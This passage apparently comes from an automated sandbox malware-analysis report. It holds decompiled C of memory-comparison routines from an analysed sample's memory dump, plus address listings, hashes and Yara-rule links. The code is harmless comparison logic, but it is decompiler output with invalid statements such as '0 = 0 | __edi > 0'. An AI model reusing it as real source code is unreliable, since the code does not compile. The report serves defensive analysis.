											_t246 = (0 | _t311 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L66;
										}
										_t246 = (0 | _t309 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L64;
									}
									_t246 = (0 | _t307 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L62;
								}
								_t313 = ( *(_t336 - 0xf) & 0x000000ff) - ( *(_t294 - 0xf) & 0x000000ff);
								if(_t313 == 0) {
									L51:
									_t315 = ( *(_t336 - 0xe) & 0x000000ff) - ( *(_t294 - 0xe) & 0x000000ff);
									if(_t315 == 0) {
										L53:
										_t317 = ( *(_t336 - 0xd) & 0x000000ff) - ( *(_t294 - 0xd) & 0x000000ff);
										if(_t317 == 0) {
											L55:
											_t246 = ( *(_t336 - 0xc) & 0x000000ff) - ( *(_t294 - 0xc) & 0x000000ff);
											if(_t246 != 0) {
												_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
											}
											goto L58;
										}
										_t246 = (0 | _t317 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L55;
									}
									_t246 = (0 | _t315 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L53;
								}
								_t246 = (0 | _t313 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L51;
							}
							_t319 = (_t200 & 0x000000ff) - ( *(_t294 - 0x13) & 0x000000ff);
							if(_t319 == 0) {
								L40:
								_t321 = ( *(_t336 - 0x12) & 0x000000ff) - ( *(_t294 - 0x12) & 0x000000ff);
								if(_t321 == 0) {
									L42:
									_t323 = ( *(_t336 - 0x11) & 0x000000ff) - ( *(_t294 - 0x11) & 0x000000ff);
									if(_t323 == 0) {
										L44:
										_t246 = ( *(_t336 - 0x10) & 0x000000ff) - ( *(_t294 - 0x10) & 0x000000ff);
										if(_t246 != 0) {
											_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
										}
										goto L47;
									}
									_t246 = (0 | _t323 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L44;
								}
								_t246 = (0 | _t321 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L42;
							}
							_t246 = (0 | _t319 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L40;
						}
						_t325 = (_t199 & 0x000000ff) - ( *(_t294 - 0x17) & 0x000000ff);
						if(_t325 == 0) {
							L29:
							_t327 = ( *(_t336 - 0x16) & 0x000000ff) - ( *(_t294 - 0x16) & 0x000000ff);
							if(_t327 == 0) {
								L31:
								_t329 = ( *(_t336 - 0x15) & 0x000000ff) - ( *(_t294 - 0x15) & 0x000000ff);
								if(_t329 == 0) {
									L33:
									_t246 = ( *(_t336 - 0x14) & 0x000000ff) - ( *(_t294 - 0x14) & 0x000000ff);
									if(_t246 != 0) {
										_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
									}
									goto L36;
								}
								_t246 = (0 | _t329 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L33;
							}
							_t246 = (0 | _t327 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L31;
						}
						_t246 = (0 | _t325 > 0x00000000) * 2 - 1;
						if(_t246 != 0) {
							goto L1;
						}
						goto L29;
					}
					_t331 = (_t198 & 0x000000ff) - ( *(_t294 - 0x1b) & 0x000000ff);
					if(_t331 == 0) {
						L18:
						_t333 = ( *(_t336 - 0x1a) & 0x000000ff) - ( *(_t294 - 0x1a) & 0x000000ff);
						if(_t333 == 0) {
							L20:
							_t335 = ( *(_t336 - 0x19) & 0x000000ff) - ( *(_t294 - 0x19) & 0x000000ff);
							if(_t335 == 0) {
								L22:
								_t246 = ( *(_t336 - 0x18) & 0x000000ff) - ( *(_t294 - 0x18) & 0x000000ff);
								if(_t246 != 0) {
									_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
								}
								goto L25;
							}
							_t246 = (0 | _t335 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L22;
						}
						_t246 = (0 | _t333 > 0x00000000) * 2 - 1;
						if(_t246 != 0) {
							goto L1;
						}
						goto L20;
					}
					_t246 = (0 | _t331 > 0x00000000) * 2 - 1;
					if(_t246 != 0) {
						goto L1;
					}
					goto L18;
				} else {
					__edi =  *(__esi - 0x1f) & 0x000000ff;
					__edi = ( *(__esi - 0x1f) & 0x000000ff) - ( *(__edx - 0x1f) & 0x000000ff);
					if(__edi == 0) {
						L7:
						__edi =  *(__esi - 0x1e) & 0x000000ff;
						__edi = ( *(__esi - 0x1e) & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
						if(__edi == 0) {
							L9:
							__edi =  *(__esi - 0x1d) & 0x000000ff;
							__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
							if(__edi == 0) {
								L11:
								__ecx =  *(__esi - 0x1c) & 0x000000ff;
								__ecx = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L14;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								goto L1;
							}
							goto L11;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L1;
						}
						goto L9;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L1;
					}
					goto L7;
				}
				L1:
				_t197 = _t246;
				return _t197;
			}
































                                                0x10006b27
                                                0x10006b27
                                                0x10006b2d
                                                0x10006bb5
                                                0x10006bb7
                                                0x10006bb9
                                                0x00000000
                                                0x00000000
                                                0x10006bbf
                                                0x10006bc5
                                                0x10006c4c
                                                0x10006c4e
                                                0x10006c50
                                                0x00000000
                                                0x00000000
                                                0x10006c56
                                                0x10006c5c
                                                0x10006ce3
                                                0x10006ce5
                                                0x10006ce7
                                                0x00000000
                                                0x00000000
                                                0x10006ced
                                                0x10006cf3
                                                0x10006d7a
                                                0x10006d7c
                                                0x10006d7e
                                                0x00000000
                                                0x00000000
                                                0x10006d8a
                                                0x10006e12
                                                0x10006e14
                                                0x10006e16
                                                0x00000000
                                                0x00000000
                                                0x10006e1c
                                                0x10006e22
                                                0x10006ea9
                                                0x10006eab
                                                0x10006ead
                                                0x00000000
                                                0x00000000
                                                0x10006eb3
                                                0x10006eb9
                                                0x10006f40
                                                0x10006f42
                                                0x10006f44
                                                0x00000000
                                                0x00000000
                                                0x10006f52
                                                0x10006f54
                                                0x10006f6c
                                                0x10006f74
                                                0x10006f76
                                                0x100066cf
                                                0x100066d7
                                                0x100066d9
                                                0x100066e6
                                                0x100066e6
                                                0x00000000
                                                0x100066d9
                                                0x10006f83
                                                0x100066c9
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x100066c9
                                                0x10006f5d
                                                0x10006f66
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006f66
                                                0x10006ec6
                                                0x10006ec8
                                                0x10006ee0
                                                0x10006ee8
                                                0x10006eea
                                                0x10006f02
                                                0x10006f0a
                                                0x10006f0c
                                                0x10006f24
                                                0x10006f2c
                                                0x10006f2e
                                                0x10006f37
                                                0x10006f37
                                                0x00000000
                                                0x10006f2e
                                                0x10006f15
                                                0x10006f1e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006f1e
                                                0x10006ef3
                                                0x10006efc
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006efc
                                                0x10006ed1
                                                0x10006eda
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006eda
                                                0x10006e2f
                                                0x10006e31
                                                0x10006e49
                                                0x10006e51
                                                0x10006e53
                                                0x10006e6b
                                                0x10006e73
                                                0x10006e75
                                                0x10006e8d
                                                0x10006e95
                                                0x10006e97
                                                0x10006ea0
                                                0x10006ea0
                                                0x00000000
                                                0x10006e97
                                                0x10006e7e
                                                0x10006e87
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006e87
                                                0x10006e5c
                                                0x10006e65
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006e65
                                                0x10006e3a
                                                0x10006e43
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006e43
                                                0x10006d98
                                                0x10006d9a
                                                0x10006db2
                                                0x10006dba
                                                0x10006dbc
                                                0x10006dd4
                                                0x10006ddc
                                                0x10006dde
                                                0x10006df6
                                                0x10006dfe
                                                0x10006e00
                                                0x10006e09
                                                0x10006e09
                                                0x00000000
                                                0x10006e00
                                                0x10006de7
                                                0x10006df0
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006df0
                                                0x10006dc5
                                                0x10006dce
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006dce
                                                0x10006da3
                                                0x10006dac
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006dac
                                                0x10006d00
                                                0x10006d02
                                                0x10006d1a
                                                0x10006d22
                                                0x10006d24
                                                0x10006d3c
                                                0x10006d44
                                                0x10006d46
                                                0x10006d5e
                                                0x10006d66
                                                0x10006d68
                                                0x10006d71
                                                0x10006d71
                                                0x00000000
                                                0x10006d68
                                                0x10006d4f
                                                0x10006d58
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006d58
                                                0x10006d2d
                                                0x10006d36
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006d36
                                                0x10006d0b
                                                0x10006d14
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006d14
                                                0x10006c69
                                                0x10006c6b
                                                0x10006c83
                                                0x10006c8b
                                                0x10006c8d
                                                0x10006ca5
                                                0x10006cad
                                                0x10006caf
                                                0x10006cc7
                                                0x10006ccf
                                                0x10006cd1
                                                0x10006cda
                                                0x10006cda
                                                0x00000000
                                                0x10006cd1
                                                0x10006cb8
                                                0x10006cc1
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006cc1
                                                0x10006c96
                                                0x10006c9f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006c9f
                                                0x10006c74
                                                0x10006c7d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006c7d
                                                0x10006bd2
                                                0x10006bd4
                                                0x10006bec
                                                0x10006bf4
                                                0x10006bf6
                                                0x10006c0e
                                                0x10006c16
                                                0x10006c18
                                                0x10006c30
                                                0x10006c38
                                                0x10006c3a
                                                0x10006c43
                                                0x10006c43
                                                0x00000000
                                                0x10006c3a
                                                0x10006c21
                                                0x10006c2a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006c2a
                                                0x10006bff
                                                0x10006c08
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006c08
                                                0x10006bdd
                                                0x10006be6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006b33
                                                0x10006b37
                                                0x10006b3b
                                                0x10006b3d
                                                0x10006b55
                                                0x10006b55
                                                0x10006b5d
                                                0x10006b5f
                                                0x10006b77
                                                0x10006b77
                                                0x10006b7f
                                                0x10006b81
                                                0x10006b99
                                                0x10006b99
                                                0x10006ba1
                                                0x10006ba3
                                                0x10006bac
                                                0x10006bac
                                                0x00000000
                                                0x10006ba3
                                                0x10006b87
                                                0x10006b8a
                                                0x10006b93
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006b93
                                                0x10006b65
                                                0x10006b68
                                                0x10006b71
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006b71
                                                0x10006b43
                                                0x10006b46
                                                0x10006b4f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006b4f
                                                0x100062b5
                                                0x100062b5
                                                0x100070a6

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.497246318.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000004.00000002.497232899.0000000010000000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497307012.0000000010014000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497331845.000000001001A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497358884.000000001001F000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                • Instruction ID: dba2690435f19ab94b9c718f143c1f7ded23596ac492d5ba3488478ce37288e5
                                                • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                • Instruction Fuzzy Hash: EAC15F3220559309FB5D8A79C83413EBBE2EB966F1327176DD4B2DF1D8EF20C5649A20
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 1001AA33, Relevance: .3, Instructions: 333COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.497331845.000000001001A000.00000004.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000004.00000002.497232899.0000000010000000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497246318.0000000010001000.00000020.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497307012.0000000010014000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497358884.000000001001F000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a8bc158d68c2eb6a482b99ac5ca4ea34feabbbffff224285eb39901da0172e52
                                                • Instruction ID: 75bf2b8c409c402bf89ce584128011f6ee5bfd5b445aeddf79bdfb4475587805
                                                • Opcode Fuzzy Hash: a8bc158d68c2eb6a482b99ac5ca4ea34feabbbffff224285eb39901da0172e52
                                                • Instruction Fuzzy Hash: 43F1F21485D2EDADCB06CBF945647FCBFB05D2A102F0841CAE4E5E6283C53A938EDB21
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 100062BD, Relevance: .3, Instructions: 331COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E100062BD(void* __edx, void* __esi) {
				signed int _t184;
				signed char _t185;
				signed char _t186;
				signed char _t187;
				signed char _t188;
				signed char _t190;
				signed int _t231;
				void* _t275;
				void* _t278;
				void* _t280;
				void* _t282;
				void* _t284;
				void* _t286;
				void* _t288;
				void* _t290;
				void* _t292;
				void* _t294;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t313;

				_t313 = __esi;
				_t275 = __edx;
				if( *((intOrPtr*)(__esi - 0x1d)) ==  *((intOrPtr*)(__edx - 0x1d))) {
					_t231 = 0;
					L11:
					if(_t231 != 0) {
						goto L1;
					}
					_t185 =  *(_t313 - 0x19);
					if(_t185 ==  *(_t275 - 0x19)) {
						_t231 = 0;
						L22:
						if(_t231 != 0) {
							goto L1;
						}
						_t186 =  *(_t313 - 0x15);
						if(_t186 ==  *(_t275 - 0x15)) {
							_t231 = 0;
							L33:
							if(_t231 != 0) {
								goto L1;
							}
							_t187 =  *(_t313 - 0x11);
							if(_t187 ==  *(_t275 - 0x11)) {
								_t231 = 0;
								L44:
								if(_t231 != 0) {
									goto L1;
								}
								_t188 =  *(_t313 - 0xd);
								if(_t188 ==  *(_t275 - 0xd)) {
									_t231 = 0;
									L55:
									if(_t231 != 0) {
										goto L1;
									}
									if( *(_t313 - 9) ==  *(_t275 - 9)) {
										_t231 = 0;
										L66:
										if(_t231 != 0) {
											goto L1;
										}
										_t190 =  *(_t313 - 5);
										if(_t190 ==  *(_t275 - 5)) {
											_t231 = 0;
											L77:
											if(_t231 == 0) {
												_t231 = ( *(_t313 - 1) & 0x000000ff) - ( *(_t275 - 1) & 0x000000ff);
												if(_t231 != 0) {
													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
												}
											}
											goto L1;
										}
										_t278 = (_t190 & 0x000000ff) - ( *(_t275 - 5) & 0x000000ff);
										if(_t278 == 0) {
											L70:
											_t280 = ( *(_t313 - 4) & 0x000000ff) - ( *(_t275 - 4) & 0x000000ff);
											if(_t280 == 0) {
												L72:
												_t282 = ( *(_t313 - 3) & 0x000000ff) - ( *(_t275 - 3) & 0x000000ff);
												if(_t282 == 0) {
													L74:
													_t231 = ( *(_t313 - 2) & 0x000000ff) - ( *(_t275 - 2) & 0x000000ff);
													if(_t231 != 0) {
														_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
													}
													goto L77;
												}
												_t231 = (0 | _t282 > 0x00000000) * 2 - 1;
												if(_t231 != 0) {
													goto L1;
												}
												goto L74;
											}
											_t231 = (0 | _t280 > 0x00000000) * 2 - 1;
											if(_t231 != 0) {
												goto L1;
											}
											goto L72;
										}
										_t231 = (0 | _t278 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L70;
									}
									_t284 = ( *(_t313 - 9) & 0x000000ff) - ( *(_t275 - 9) & 0x000000ff);
									if(_t284 == 0) {
										L59:
										_t286 = ( *(_t313 - 8) & 0x000000ff) - ( *(_t275 - 8) & 0x000000ff);
										if(_t286 == 0) {
											L61:
											_t288 = ( *(_t313 - 7) & 0x000000ff) - ( *(_t275 - 7) & 0x000000ff);
											if(_t288 == 0) {
												L63:
												_t231 = ( *(_t313 - 6) & 0x000000ff) - ( *(_t275 - 6) & 0x000000ff);
												if(_t231 != 0) {
													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
												}
												goto L66;
											}
											_t231 = (0 | _t288 > 0x00000000) * 2 - 1;
											if(_t231 != 0) {
												goto L1;
											}
											goto L63;
										}
										_t231 = (0 | _t286 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L61;
									}
									_t231 = (0 | _t284 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L59;
								}
								_t290 = (_t188 & 0x000000ff) - ( *(_t275 - 0xd) & 0x000000ff);
								if(_t290 == 0) {
									L48:
									_t292 = ( *(_t313 - 0xc) & 0x000000ff) - ( *(_t275 - 0xc) & 0x000000ff);
									if(_t292 == 0) {
										L50:
										_t294 = ( *(_t313 - 0xb) & 0x000000ff) - ( *(_t275 - 0xb) & 0x000000ff);
										if(_t294 == 0) {
											L52:
											_t231 = ( *(_t313 - 0xa) & 0x000000ff) - ( *(_t275 - 0xa) & 0x000000ff);
											if(_t231 != 0) {
												_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
											}
											goto L55;
										}
										_t231 = (0 | _t294 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L52;
									}
									_t231 = (0 | _t292 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L50;
								}
								_t231 = (0 | _t290 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L48;
							}
							_t296 = (_t187 & 0x000000ff) - ( *(_t275 - 0x11) & 0x000000ff);
							if(_t296 == 0) {
								L37:
								_t298 = ( *(_t313 - 0x10) & 0x000000ff) - ( *(_t275 - 0x10) & 0x000000ff);
								if(_t298 == 0) {
									L39:
									_t300 = ( *(_t313 - 0xf) & 0x000000ff) - ( *(_t275 - 0xf) & 0x000000ff);
									if(_t300 == 0) {
										L41:
										_t231 = ( *(_t313 - 0xe) & 0x000000ff) - ( *(_t275 - 0xe) & 0x000000ff);
										if(_t231 != 0) {
											_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
										}
										goto L44;
									}
									_t231 = (0 | _t300 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L41;
								}
								_t231 = (0 | _t298 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L39;
							}
							_t231 = (0 | _t296 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L37;
						}
						_t302 = (_t186 & 0x000000ff) - ( *(_t275 - 0x15) & 0x000000ff);
						if(_t302 == 0) {
							L26:
							_t304 = ( *(_t313 - 0x14) & 0x000000ff) - ( *(_t275 - 0x14) & 0x000000ff);
							if(_t304 == 0) {
								L28:
								_t306 = ( *(_t313 - 0x13) & 0x000000ff) - ( *(_t275 - 0x13) & 0x000000ff);
								if(_t306 == 0) {
									L30:
									_t231 = ( *(_t313 - 0x12) & 0x000000ff) - ( *(_t275 - 0x12) & 0x000000ff);
									if(_t231 != 0) {
										_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
									}
									goto L33;
								}
								_t231 = (0 | _t306 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L30;
							}
							_t231 = (0 | _t304 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L28;
						}
						_t231 = (0 | _t302 > 0x00000000) * 2 - 1;
						if(_t231 != 0) {
							goto L1;
						}
						goto L26;
					}
					_t308 = (_t185 & 0x000000ff) - ( *(_t275 - 0x19) & 0x000000ff);
					if(_t308 == 0) {
						L15:
						_t310 = ( *(_t313 - 0x18) & 0x000000ff) - ( *(_t275 - 0x18) & 0x000000ff);
						if(_t310 == 0) {
							L17:
							_t312 = ( *(_t313 - 0x17) & 0x000000ff) - ( *(_t275 - 0x17) & 0x000000ff);
							if(_t312 == 0) {
								L19:
								_t231 = ( *(_t313 - 0x16) & 0x000000ff) - ( *(_t275 - 0x16) & 0x000000ff);
								if(_t231 != 0) {
									_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
								}
								goto L22;
							}
							_t231 = (0 | _t312 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L19;
						}
						_t231 = (0 | _t310 > 0x00000000) * 2 - 1;
						if(_t231 != 0) {
							goto L1;
						}
						goto L17;
					}
					_t231 = (0 | _t308 > 0x00000000) * 2 - 1;
					if(_t231 != 0) {
						goto L1;
					}
					goto L15;
				} else {
					__edi = __al & 0x000000ff;
					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
					if(__edi == 0) {
						L4:
						__edi =  *(__esi - 0x1c) & 0x000000ff;
						__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
						if(__edi == 0) {
							L6:
							__edi =  *(__esi - 0x1b) & 0x000000ff;
							__edi = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
							if(__edi == 0) {
								L8:
								__ecx =  *(__esi - 0x1a) & 0x000000ff;
								__ecx = ( *(__esi - 0x1a) & 0x000000ff) - ( *(__edx - 0x1a) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L11;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								goto L1;
							}
							goto L8;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L1;
						}
						goto L6;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L1;
					}
					goto L4;
				}
				L1:
				_t184 = _t231;
				return _t184;
			}






























                                                0x100062bd
                                                0x100062bd
                                                0x100062c3
                                                0x1000633a
                                                0x1000633c
                                                0x1000633e
                                                0x00000000
                                                0x00000000
                                                0x10006344
                                                0x1000634a
                                                0x100063d1
                                                0x100063d3
                                                0x100063d5
                                                0x00000000
                                                0x00000000
                                                0x100063db
                                                0x100063e1
                                                0x10006468
                                                0x1000646a
                                                0x1000646c
                                                0x00000000
                                                0x00000000
                                                0x10006472
                                                0x10006478
                                                0x100064ff
                                                0x10006501
                                                0x10006503
                                                0x00000000
                                                0x00000000
                                                0x10006509
                                                0x1000650f
                                                0x10006596
                                                0x10006598
                                                0x1000659a
                                                0x00000000
                                                0x00000000
                                                0x100065a6
                                                0x1000662e
                                                0x10006630
                                                0x10006632
                                                0x00000000
                                                0x00000000
                                                0x10006638
                                                0x1000663e
                                                0x100066c5
                                                0x100066c7
                                                0x100066c9
                                                0x100066d7
                                                0x100066d9
                                                0x100066e6
                                                0x100066e6
                                                0x100066d9
                                                0x00000000
                                                0x100066c9
                                                0x1000664b
                                                0x1000664d
                                                0x10006665
                                                0x1000666d
                                                0x1000666f
                                                0x10006687
                                                0x1000668f
                                                0x10006691
                                                0x100066a9
                                                0x100066b1
                                                0x100066b3
                                                0x100066bc
                                                0x100066bc
                                                0x00000000
                                                0x100066b3
                                                0x1000669a
                                                0x100066a3
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x100066a3
                                                0x10006678
                                                0x10006681
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006681
                                                0x10006656
                                                0x1000665f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x1000665f
                                                0x100065b4
                                                0x100065b6
                                                0x100065ce
                                                0x100065d6
                                                0x100065d8
                                                0x100065f0
                                                0x100065f8
                                                0x100065fa
                                                0x10006612
                                                0x1000661a
                                                0x1000661c
                                                0x10006625
                                                0x10006625
                                                0x00000000
                                                0x1000661c
                                                0x10006603
                                                0x1000660c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x1000660c
                                                0x100065e1
                                                0x100065ea
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x100065ea
                                                0x100065bf
                                                0x100065c8
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x100065c8
                                                0x1000651c
                                                0x1000651e
                                                0x10006536
                                                0x1000653e
                                                0x10006540
                                                0x10006558
                                                0x10006560
                                                0x10006562
                                                0x1000657a
                                                0x10006582
                                                0x10006584
                                                0x1000658d
                                                0x1000658d
                                                0x00000000
                                                0x10006584
                                                0x1000656b
                                                0x10006574
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006574
                                                0x10006549
                                                0x10006552
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006552
                                                0x10006527
                                                0x10006530
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006530
                                                0x10006485
                                                0x10006487
                                                0x1000649f
                                                0x100064a7
                                                0x100064a9
                                                0x100064c1
                                                0x100064c9
                                                0x100064cb
                                                0x100064e3
                                                0x100064eb
                                                0x100064ed
                                                0x100064f6
                                                0x100064f6
                                                0x00000000
                                                0x100064ed
                                                0x100064d4
                                                0x100064dd
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x100064dd
                                                0x100064b2
                                                0x100064bb
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x100064bb
                                                0x10006490
                                                0x10006499
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006499
                                                0x100063ee
                                                0x100063f0
                                                0x10006408
                                                0x10006410
                                                0x10006412
                                                0x1000642a
                                                0x10006432
                                                0x10006434
                                                0x1000644c
                                                0x10006454
                                                0x10006456
                                                0x1000645f
                                                0x1000645f
                                                0x00000000
                                                0x10006456
                                                0x1000643d
                                                0x10006446
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006446
                                                0x1000641b
                                                0x10006424
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006424
                                                0x100063f9
                                                0x10006402
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006402
                                                0x10006357
                                                0x10006359
                                                0x10006371
                                                0x10006379
                                                0x1000637b
                                                0x10006393
                                                0x1000639b
                                                0x1000639d
                                                0x100063b5
                                                0x100063bd
                                                0x100063bf
                                                0x100063c8
                                                0x100063c8
                                                0x00000000
                                                0x100063bf
                                                0x100063a6
                                                0x100063af
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x100063af
                                                0x10006384
                                                0x1000638d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x1000638d
                                                0x10006362
                                                0x1000636b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x100062c5
                                                0x100062c5
                                                0x100062cc
                                                0x100062ce
                                                0x100062e2
                                                0x100062e2
                                                0x100062ea
                                                0x100062ec
                                                0x10006300
                                                0x10006300
                                                0x10006308
                                                0x1000630a
                                                0x1000631e
                                                0x1000631e
                                                0x10006326
                                                0x10006328
                                                0x10006331
                                                0x10006331
                                                0x00000000
                                                0x10006328
                                                0x10006310
                                                0x10006313
                                                0x1000631c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x1000631c
                                                0x100062f2
                                                0x100062f5
                                                0x100062fe
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x100062fe
                                                0x100062d4
                                                0x100062d7
                                                0x100062e0
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x100062e0
                                                0x100062b5
                                                0x100062b5
                                                0x100070a6

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.497246318.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000004.00000002.497232899.0000000010000000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497307012.0000000010014000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497331845.000000001001A000.00000004.00020000.sdmp Download File
